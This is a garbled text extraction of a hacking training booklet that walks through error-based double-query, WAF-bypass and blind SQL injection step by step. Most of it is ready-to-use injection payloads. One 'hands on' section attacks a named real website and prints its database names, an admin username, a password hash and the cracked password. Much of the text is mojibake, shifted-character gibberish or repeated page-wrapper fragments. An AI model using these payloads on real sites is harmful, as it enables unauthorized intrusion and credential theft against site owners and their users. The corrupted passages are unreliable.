Ultra Hackers Training

!" # $ % $
$ $

$ $

&'()
*'()
'*+*'*'*

,*'*+

- * *.
*+ $ *
*+ / *

$ * *
% *
*'
*( *

!"# $

%$&
$'%$&

!

" # $ !%
! & $ '
' ($ ' # % %
) %* %' $ '
+ " % &
' ! #
$,
( $

- .

!
"- ( %

.
% % % %
$ $ $ -
-
- -
// $$$
0

1"1"#23."

"0" )*4/ +)

* !5!& 6!7%66898& % ) -
2
: !
* &

%"()*+,-.-/0*-100.0-*
; "-#./
/- <9=89"0" )*4/ +)

"3 " & 9=89

^W/>/d/KE

hůƚƌĂ,ĂĐŬĞƌƐdƌĂŝŶŝŶŐ<ŝƚ
z͘ŶƚŽ

&ŽƌƚŚŝĐĂů,ĂĐŬĞƌƐĂŶĚǇďĞƌ^ĞĐƵƌŝƚǇWƌŽĨĞƐƐŝŽŶĂůƐ
ͲͲz͘ŶƚŽ

ďŽƵƚƚŚĞƵƚŚŽƌ
z͘ŶƚŽ
z͘ŶƚŽ;D/dW͕͗D/dW͗D͕
Ed͕Dd^͕DW͕ZW͕D^͕
EĂŶĚ,ͿŝƐĂǁƌŝƚĞƌ͕
,ĂĐŬĞƌ͕tĞďĚĞƐŝŐŶĞƌ͕EĞƚǁŽƌŬ
ĂĚŵŝŶŝƐƚƌĂƚŽƌ͕WŚŽŶĞĂƉƉůŝĐĂƚŝŽŶ
ĚĞǀĞůŽƉĞƌ͕EĞƚǁŽƌŬĞƐŝŐŶĞƌ͕
ŶƚĞƌƉƌŝƐĞĚŵŝŶŝƐƚƌĂƚŽƌ͕,ĂƌĚǁĂƌĞƚĞĐŚŶŝĐŝĂŶ͕ǇďĞƌƐĞĐƵƌŝƚǇ
ĞǆƉĞƌƚ͕ŶŐŝŶĞĞƌŝŶŐ^ƚƵĚĞŶƚ͕DŝĐƌŽƐŽĨƚ^ƚƵĚĞŶƚWĂƌƚŶĞƌ͕/ŶƚĞů
^ŽĨƚǁĂƌĞWĂƌƚŶĞƌ͕WŚŽƚŽŐƌĂƉŚĞƌĂŶĚƚƌĂŝŶĞƌǁŚŽŚĂƐǁŽƌŬŝŶŐ
ǁŝƚŚŝŽŶŶĞƚǁŽƌŬƐŚĞŚĂƐƉƌĞǀŝŽƵƐůǇĂƚƚĞŶĚĞĚŵĂŶǇ/
/ŶƚĞƌŶĂƚŝŽŶĂůŽŶĨĞƌĞŶĐĞƐĂŶĚŶĂƚŝŽŶĂůĐŽŶĨĞƌĞŶĐĞƐĂŶĚŵŽƌĞ
ŚŝƐƌĞƐĞĂƌĐŚǁĂƐĂďŽƵƚƐĞĐƵƌŝŶŐ/d͞dŚĞďĞƐƚǁĂǇƚŽŚĂĐŬŝƐƚŚĞ
ďĞƐƚǁĂǇƚŽƐĞĐƵƌĞ͟ĂďŽƵƚŶƚŽďǇǀŝƐŝƚŝŶŐŚŝƐƚĞĐŚŶŝĐĂůďůŽŐĂƚ
ŚƚƚƉ͗ͬͬĂŶƚŽϮϬϭϬ͘ǁĞĞďůǇ͘ĐŽŵ
ǁĂƚĐŚŵŽƌĞŚĂĐŬŝŶŐŵƵůƚŝŵĞĚŝĂĐŽŶƚĞŶƚǀŝƐŝƚŚŝƐĐŚĂŶŶĞů
ŚƚƚƉ͗ͬͬǁǁǁ͘ǇŽƵƚƵďĞ͘ĐŽŵͬƵŶŝǀĞƌƐŝƚǇŽĨŚĂĐŬŝŶŐ
Kƌ
ŚƚƚƉ͗ͬͬĨĂĐĞďŽŽŬ͘ĐŽŵͬƵŶŝǀĞƌƐŝƚǇŽĨŚĂĐŬŝŶŐ
ŚƚƚƉ͗ͬͬǁǁǁ͘ǇŽƵƚƵďĞ͘ĐŽŵͬtϭŚĂŶŶĞů

ŽŶƚĞŶƚƐĂƚĂ'ůĂŶĐĞ

,WdZϭ Kh>YhZz^^Y> ϭͲϮϭ
/E:d/KE
,WdZϮ ^Y>/E:d/KEzW^^/E't& ϮϮͲϮϵ
,WdZϯ d/D^>/E^Y>/E:d/KE ϯϬͲϯϴ

Kh>YhZz^^Y>/E:d/KE ,WdZϭ

What is double query based SQL

injection?
It is another type of SQL injection. In this method we can

query SQL databases by using two queries together
combined in a single query statement. This makes up
confusing the backend database and causing errors to be
thrown in client side. The errors received will contain the
information we are trying to extract result.

Step1
ϭͮW Ă Ő Ğ


SQL Command
http:// Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(database())) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Now you will get result like this
As you can see the site is vulnerable and returned an error

with the current database listed in the error, in this case
"Vicitim_Database". In here We have used both floor() and
rand() to query information_schema.tables which are being
nulled out in this request as floor(rand(0)*2) is null, which
allows the rest of our request to be processed and return the
current database name. The basic syntax will repeat itself
so you will pick it up over time if it does not catch on right
away. Moving on now that we know it is vulnerable we can
test for additional databases, as well as version info and
ϮͮW Ă Ő Ğ


user info, Once the basic system info is grasped we can
move on to grabbing tables, columns, and finally extraction
of data. In order to test for additional databases we need to
first grab the count by alter the above request to:
Step2
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e)
FROM information_schema.schemata LIMIT 0,1)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
from information_schema.tables GROUP BY x)a)
ϯͮW Ă Ő Ğ


Now that we have the count we can alter the above to use
CONCAT and LIMIT to grab the name of each database
available.
Step3
SQL Command
distinct concat(0x7e,0x27,cast(schema_name as
char),0x27,0x7e) FROM information_schema.schemata
LIMIT N,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
NOTE: You will need to keep incrementing the value of

"N" in the middle of the above query to work your way
through the available DB names, just keep going until you
have reached the number returned in our request above this
one. (i.e. LIMIT 0,1 followed by LIMIT 1,1 followed by
LIMIT 2,1 and just repeat as needed). We have to do this
VLQFHZHFDQ¶WXVH*5283B&21&$7
ϰͮW Ă Ő Ğ


Message will appear the same, but LIMIT will be changed

to get different DB Name each time
Step4
Once you have all the DB names you might want to find
out the current user and confirm version info as well as
some other basic stuff. It can be done using slight
variations to our original query for current database which
would look like this, notice only the call in the middle is
being altered.
SQL Command
Finding the version of the database
ϱͮW Ă Ő Ğ


concat(version())) FROM information_schema.tables
Step5
User
SQL Command
FROM(select count(*),concat((select (select concat(user()))
FROM information_schema.tables LIMIT
GROUP BY x)a)
ϲͮW Ă Ő Ğ


Step5
DATADIR
SQL Command
concat(@@datadir)) FROM information_schema.tables
ϳͮW Ă Ő Ğ


Step6
HOSTNAME
SQL Command
concat(@@hostname)) FROM information_schema.tables
NOTE: DATADIR & HOSTNAME might not always

work, depending on version and DB setup
ϴͮW Ă Ő Ğ


Step7
Find the no of tables
Alright, we have gathered the basic info so now it is time to

move on to actually grabbing the table and column names.
As with other methods we will start with tables and then
work to columns, and like the above examples we will be
using CONCAT and LIMIT to allow us to get the entire
contents since we cannot use GROUP_CONCAT(). We
first get the count and then enumerate the tables.
SQL Command
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM
ìnformation_schema`.tables WHERE
table_schema=<HEX_VLAUE_OF_DB_NAME>)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
FROM information_schema.tables GROUP BY x)a)
ϵͮW Ă Ő Ğ

Once the count is known, we enumerate tables one by one.
Step8
Finding the table name
SQL Command
distinct concat(0x7e,0x27,cast(table_name as
char),0x27,0x7e) FROM information_schema.tables
WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>
LIMIT 1,1)) FROM information_schema.tables LIMIT
GROUP BY x)a)
ϭϬͮW Ă Ő Ğ


You will need to HEX the DB Name from which you are
pulling table names from or it will not be properly
processed, same is true if you are pulling columns from
tables as we will do in this next step now that we have
found some tables.
Step9
Finding the no of column
SQL Command
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM
ìnformation_schema`.columns WHERE
table_schema=<HEX_VLAUE_OF_DB_NAME> AND
table_name=<HEX_VLAUE_OF_TABLE_NAME>))
ϭϭͮW Ă Ő Ğ


FROM information_schema.tables LIMIT
GROUP BY x)a)
Once the number of columns is known we can just use

LIMIT again to sort through them one by one, just keep
incrementing LIMIT until you have found as many as it
returned in the above request.
Step10
Finding the column name
SQL Command
FROM(select count(*),concat((select (select (select distinct
concat(cast(column_name as char)) FROM
information_schema.columns WHERE
ϭϮͮW Ă Ő Ğ


table_schema=<HEX_VLAUE_OF_DB_NAME> AND
table_name=<HEX_VLAUE_OF_TABLE_NAME>
LIMIT 0,1)) FROM information_schema.tables LIMIT
GROUP BY x)a)
OK, so now we have outlined the entire database structure

and know the tables and columns. Now it is finally time to
extract the desired data from the database.
Step11
Final process
SQL Command
http://Victim.com/index.php?id=7+and+(select 1
FROM(select+count(*),concat((select+concat(0x3a,userna
me,0x3a,password,0x3a,email,0x3a) FROM
ϭϯͮW Ă Ő Ğ


<TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x
FROM information_schema.tables+GROUP BY x)b)
If you need to continue you can do what we have done for

every other request and start incrementing the LIMIT value
to enumerate all of the data you want to pull. You have
successfully extracted data using Double Query SQL
Injection.
ϭϰͮW Ă Ő Ğ


Hands on experience
Step1
First you must target any site in here am targeted
http://www.techvision.co.uk
Step2
Check the site is vulnerable or not in my case this site is
vulnerable
http://www.techvision.co.uk/news.php?id=45
Now you can get error like this:
ϭϱͮW Ă Ő Ğ


You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near ''' at line 1
Step3
Check the version of MySQL
http://www.techvision.co.uk/news.php?id=45+and+(select+
1+from(select%0Acount(*),concat((select+concat(version()
)+from+information_schema.tables+limit+0,1),floor(Rand(
0)*2))a+from+information_schema.tables+group+by+a)b)
Now you can get version of the database:
Duplicate entry '5.0.95-log1' for key 1
ϭϲͮW Ă Ő Ğ


Step4
Check the name of the database
http://www.techvision.co.uk/news.php?id=45 and (select 1

from (select count(*),concat((select(select
concat(cast(database() as char),0x7e)) from
information_schema.tables where table_schema=database()
limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
Duplicate entry 'techvision281009~1' for key 1
ϭϳͮW Ă Ő Ğ


Step5
Find the name of the table

concat(cast(table_name as char),0x7e)) from
information_schema.tables where table_schema=database()
limit 2,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
Duplicate entry 'users~1' for key 1
Next step you must convert name of the table to hex value
In now a day there are more tools are available in online to

conversion
ϭϴͮW Ă Ő Ğ


Step6
Find the name of the column present in the table

concat(cast(column_name as char),0x7e)) from
information_schema.columns where
table_name=0x7573657273 limit 1,1),floor(rand(0)*2))x
from information_schema.tables group by x)a)
Duplicate entry 'username~1' for key 1
ϭϵͮW Ă Ő Ğ


Step7
Find the name of the column present in the table
In here i am changing the limit to fine the another column
columns where table_name=0x7573657273 limit 2,1)

concat(cast(column_name as char),0x7e)) from
information_schema.columns where
table_name=0x7573657273 limit 2,1),floor(rand(0)*2))x
from information_schema.tables group by x)a)
Duplicate entry 'password~1' for key 1
ϮϬͮW Ă Ő Ğ


Step7
Final step
Duplicate entry
'debandy~9679ee7b0e7ddb35b34046a7c76e6e23~1' for
key 1
Decrypt the value to get the password
9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b
Note: only for learning purposes, do not use it for illegal

operation
ϮϭͮW Ă Ő Ğ

^Y>/E:d/KEzW^^/E't& ,WdZϮ

What is SQL injection bypassing WAF?
WAF stands for Web Application Firewall. It is another

type of SQL injection. In now a day SQL commands are
used for SQL injection, they allow us to bypass a lot of the
restrictions of Web application firewalls and to kill certain
64/VWDWHPHQWVWRH[HFXWHWKHDWWDFNHU¶VFRPPDQGVZKLOH
commenting out the actual legitimate query.
Some other comments in SQL

//, ² , /**/, #, ±+, ² -, ;
Attacking steps
http://www.victim.com/index.php?id=777
No Errors
http://www.victim.com/index.php?id=777¶¶
Errors
ϮϮͮW Ă Ő Ğ

http://www.victim.com/index.php?id=777+ORDER+BY+1
,2,3,4,5--
No Errors
http://www.victim.com/index.php?id=777+ORDER+BY+1
,2,3,4,5,6--
Errors
http://www.victim.com/index.php?id=777+UNION+SELE
CT+1,2,3,4,5--
403 Forbidden
http://www.victim.com/index.php?id=-
777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
Now we will see if we can get one past the WAF system by
using some comments to hide the parts of our statement
that our most likely being filtered.
http://www.victim.com/index.php?id=777+UNION+SELE
CT+1,2,3,4,5--
403 Forbidden
ϮϯͮW Ă Ő Ğ


777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
777+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--
No Errors
Now there is no more 403 Forbidden message stopping you

and you can see the vulnerable columns displayed on the
page. In my examples I will assume columns 2, 4, & 5 are
vulnerable. Now that we have the vulnerable columns we
FDQ H[WUDFW VRPH GDWD OHW¶V ILUVW ILQG VRPH EDVLF LQIR
though. We will use CONCAT to grab the current database
name, the current user, and the version info
777+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),u
ser(),version()),3,4,5--
403 Forbidden
ϮϰͮW Ă Ő Ğ


Ok, so now we have commented out our UNION SELECT
statement but something is still setting off the filters. It is
most likely the CONCAT statement. In some cases it is
possible to bypass filters by simply changing the norm up
and retesting.
777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),use
r(),version()),3,4,5--
No Errors
Now you can get result like this
Version = 5.1.81-community
User = sample@localhost
Database() = sampled
Now you will know the current database name, user name
and the version as they are neatly displayed on the page for
us. These two techniques can be combined to evade filters
throughout your Injections as you will see. Now let us try
to get the list of all the databases available, instead of just
the current one
ϮϱͮW Ă Ő Ğ


777+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(S
CHEMA_NAME),3,4,5+FROM+INFORMATION_SCHE
MA.SCHEMATA--
403 Forbidden
Now you know what to do now so start by altering

GROUP_CONCAT, same as we did for CONCAT
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCH
EMA_NAME),3,4,5+FROM+INFORMATION_SCHEM.S
CHEMATA--
No Errors
Information_Schema
sampleDB
This should now show us the available databases; now let

us check for the tables on the current database.
ϮϲͮW Ă Ő Ğ


777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TA
BLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.T
ABLES+WHERE+TABLE_SCHEMA=DATABASE()--
403 Forbidden again
In some cases you may have experienced a 403 in the

previous step as well, it is due to the fact that often times
INFORMATION_SCHEMA or TABLES will be filtered.
Again, this changes from site to site based on how it was
configured so it could even be other items but these are the
most common. In order to get around the filters we simply
need to use our comments method again
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TA
BLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM
*/.TABLES--
No Errors
Admin, Groups, Getalk, Users
ϮϳͮW Ă Ő Ğ


Now we have all of the tables for the current database
displayed on the page without any 403 holding us back and
convert the table name as Hex value
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(CO
LUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCH
EM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d6
96e--
No Errors
id
pwd
mailid
OK, now it we know the tables and associated columns. It

is time to get some data extracted
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0
x3a, pwd,0x3a,mailid,0x3a),3,4,5+FROM+Admin²
ϮϴͮW Ă Ő Ğ


Now you will get id mailid pwd etc..
Some useful dorks
/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&i
d=*/table²
union select column from table
/*!union*/+/*!select*/+1,2,3²
/*!UnIOn*//*!SeLect*/+1,2,3²
un/**/ion+sel/**/ect+1,2,3²
·
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T
*/1,2,3²
ϮϵͮW Ă Ő Ğ

d/D^>/E^Y>/E:d/KE ,WdZϯ

It is another type of SQL injection. In this chapter I show

how attackers take advantage of SQL Injection
vulnerabilities by using time-based blind SQL injection
with heavy queries.
Steps to be follow
First you must target any victim for example
http://www.victim.com/index.php?id=777
In blind injections you will be using TRUE/FALSE

statements to gain result; in here it is based around the
feedback received from the server as a result.
http://www.victim.com/index.php?id=777 AND 1=1

No Errors
http://www.victim.com/index.php?id=777 AND 1=2

Errors on Page
ϯϬͮW Ă Ő Ğ


Now you have the column count, but we will need to check
the version.
http://www.victim.com/index.php?id=777¶DQG
substring(@@version,1,1)=4--+-¶
substring(@@version,1,1)=5--+-¶
Now you will get result like this:
5.0
So this is a good time to start enumerating some table

names from the current database.
In here you will use TRUE/FALSE request statements and

then analyze the errors or response generated to determine
if we are on the right track, as we will need to start by
guessing the table names. This may take some guessing and
sometime which LVZK\PRVWSHRSOHGRQ¶WOLNHWKLVPHWKRG
but it can pay off when nothing else will work so just have
some patience. It will work like this:
http://www.victim.com/index.php?id=777¶ DQG 6(/(&7

1 from passwords limit 0,1)=1--+-
ϯϭͮW Ă Ő Ğ


Errors

1 from users limit 0,1)=1--+-
Errors

1 from members limit 0,1)=1--+-
Errors

1 from admin limit 0,1)=1--+-
No Errors
Note ,Q WKH HUURUV VRPHWLPHV LW ZLOO VD\ ³7DEOH

'X.<guessed_table_QDPH!
GRHVQ
W H[LVW´ 7KLV HUURU
indicateV WKH FXUUHQW GDWDEDVH QDPH ZKHUH ³;´ LV LQ FDVH
\RXFRXOGQ¶WILQGLWHOVHZKHUH
Guess it yourself every database has table name like admin,

users, etc.
ϯϮͮW Ă Ő Ğ


Now you will be using the TRUE/FALSE results to
determine what columns are present in the table. It will
work like this:
http://www.victim.com/index.php?id=777¶DQG6(/(&7
substring(concat(1,<insert-column-guess-here>),1,1) from
<table-name> limit 0,1)=1--+-¶
You are now using SUBSTRING to query within query and

check for columns FROM our found table (admin).

substring(concat(1,userid),1,1) from admin limit 0,1)=1--+-
No Errors

substring(concat(1,login),1,1) from admin limit 0,1)=1--+-
Errors

substring(concat(1,username),1,1) from admin limit
0,1)=1--+-
No Errors
ϯϯͮW Ă Ő Ğ


substring(concat(1,password),1,1) from admin limit 0,1)=1-
-+-
No Errors
Now you will change limit to get different
Now that you have found the table name and associated
column names we can actually extract some data. In order
to extract you will change up our syntax slightly so that it
takes advantage of the ASCII CHAR conversion. We will
again analyze the results of based on TRUE/FALSE
responses. This part is very time consuming as we have to
get each letter at a time (in CHAR value) and then convert
it over to get the standard plain text that most people can
identify with.
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>65
TRUE ± the first char of password for admin with userid1

is great than 65 so we need to go higher with our next
request until we hit error
ϯϰͮW Ă Ő Ğ


FALSE ± Error, indicating it is not a char greater than 122

which is good as that is what we would expect, so now we
need to meet in the middle
TRUE ± still need to continue moving higher
FALSE ± getting warmer, but still need to reduce a little
TRUE ± still need to continue moving higher
ϯϱͮW Ă Ő Ğ


FALSE ± indicating we have gone too far ± WTF?
TRUE ± Indicating we need to move up
As you can see this can take some time. In the example
above we would use some reasoning and determine that the
char value is greater than 111, but less than 113. When we
ran the test against 112 it indicated as true thus meaning it
is greater than OR equal to 112. If we convert this we get
WKH OHWWHU ³S´ 2. VR ZH KDYH WKH ILUVW OHWWHU QRZ OHW¶V
adjust our LIMIT at the end to move on to the second
character position. We will also do our best to use our
brains to speed things up and start guessing the next logical
FKDUDFWHUWRIROORZD³SÓLNHPD\EHDQ³D´ ,WQRZ
looks like this:
ϯϲͮW Ă Ő Ğ


FALSE ± indicating we have gone too far and that we were

right with WKHJXHVVRIDQ³D´ZKLFKLVWKHFKDUYDOXHIRU
OK so we have no found the first two letters of the

SDVVZRUGZKLFKDUH³SDÓHW¶VNHHSJXHVVLQJ
FALSE ± indicating we have gone too far and that we were

ULJKWRQWUDFNZLWKWKHJXHVVLQJRIDQ³V´ZKLFKLVWKHFKDU
value for 115
ϯϳͮW Ă Ő Ğ


FALSE ± indicating we have gone to far and found us
DQRWKHU³V´RU
TRUE ± indicating we KDYHIRXQGDQRWKHU³V´
When we put it together we have found char values of 112,

97, 115, & 115 which when converted equate WR ³SDVV´
The admin with useULG KDV D SDVVZRUG RI ³SDVV´ ,Q
some cases the char values may be for an MD5 hash so it
might not come across until you have the entire thing. You
can keep adjusting the LIMIT value until you no longer get
any return values.
Note: this chapter is only for training purposes only do not

use it for illegal activities
ϯϴͮW Ă Ő Ğ

Buy your books fast and straightforward online - at one of world’s
fastest growing online book stores! Environmentally sound due to
Print-on-Demand technologies.
Buy your books online at

www.get-morebooks.com
Kaufen Sie Ihre Bücher schnell und unkompliziert online – auf einer
der am schnellsten wachsenden Buchhandelsplattformen weltweit!
Dank Print-On-Demand umwelt- und ressourcenschonend produzi-
ert.
Bücher schneller online kaufen

www.morebooks.de
VDM Verlagsservicegesellschaft mbH
Heinrich-Böcking-Str. 6-8 Telefon: +49 681 3720 174 info@vdm-vsg.de
D - 66121 Saarbrücken Telefax: +49 681 3720 1749 www.vdm-vsg.de

Ultra Hackers Training

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Ultra Hackers Training

Caricato da

Copyright:

Formati disponibili

      

           

 !"# $  

// $$$   

0  

"0"  )*4/ +)

*   &

; "-#./ 

/- <9=89"0"  )*4/ +)

What is double query based SQL

It is another type of SQL injection. In this method we can

Now you will get result like this

As you can see the site is vulnerable and returned an error

Now you will get result like this

NOTE: You will need to keep incrementing the value of

Message will appear the same, but LIMIT will be changed

Finding the version of the database

Now you will get result like this

Now you will get result like this

Now you will get result like this

NOTE: DATADIR & HOSTNAME might not always

Find the no of tables

Alright, we have gathered the basic info so now it is time to

Now you will get result like this

Once the count is known, we enumerate tables one by one.

Finding the table name

Finding the no of column

Now you will get result like this

Once the number of columns is known we can just use

Finding the column name

Now you will get result like this

OK, so now we have outlined the entire database structure

Now you will get result like this

If you need to continue you can do what we have done for

Now you can get error like this:

Now you can get version of the database:

Duplicate entry '5.0.95-log1' for key 1

http://www.techvision.co.uk/news.php?id=45 and (select 1

Duplicate entry 'techvision281009~1' for key 1

http://www.techvision.co.uk/news.php?id=45 and (select 1

Duplicate entry 'users~1' for key 1

In now a day there are more tools are available in online to

http://www.techvision.co.uk/news.php?id=45 and (select 1

Duplicate entry 'username~1' for key 1

In here i am changing the limit to fine the another column

columns where table_name=0x7573657273 limit 2,1)

http://www.techvision.co.uk/news.php?id=45 and (select 1

Duplicate entry 'password~1' for key 1

Decrypt the value to get the password

Note: only for learning purposes, do not use it for illegal

What is SQL injection bypassing WAF?

WAF stands for Web Application Firewall. It is another

Some other comments in SQL

Now there is no more 403 Forbidden message stopping you

Now you can get result like this

Now you know what to do now so start by altering

Now you can get result like this

This should now show us the available databases; now let

In some cases you may have experienced a 403 in the

Now you can get result like this

Admin, Groups, Getalk, Users

Now you can get result like this

OK, now it we know the tables and associated columns. It

Some useful dorks

!"# $

// $$$

0

"0" )*4/ +)

* &

; "-#./

/- <9=89"0" )*4/ +)

Note ,Q WKH HUURUV VRPHWLPHV LW ZLOO VD\ ³7DEOH